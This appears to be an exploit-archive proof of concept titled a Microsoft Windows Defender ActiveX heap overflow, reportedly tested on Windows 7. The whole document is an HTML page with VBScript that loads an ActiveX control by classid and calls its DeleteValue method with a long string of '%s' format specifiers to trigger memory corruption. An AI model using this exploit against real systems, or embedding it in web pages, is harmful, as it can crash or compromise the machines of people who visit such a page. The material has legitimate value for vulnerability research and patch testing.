19 lines
No EOL
630 B
HTML
19 lines
No EOL
630 B
HTML
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
|
|
#tested on :[windows 7]
|
|
#Microsoft Windows Defender
|
|
|
|
<html>
|
|
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
|
|
<script language='vbscript'>
|
|
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
|
|
prototype = "Sub DeleteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String )"
|
|
memberName = "DeleteValue"
|
|
progid = "MpComExportsLib.MsMpSimpleConfig"
|
|
argCount = 2
|
|
|
|
arg1="defaultV"
|
|
arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
|
|
|
|
target.DeleteValue arg1 ,arg2
|
|
|
|
</script> |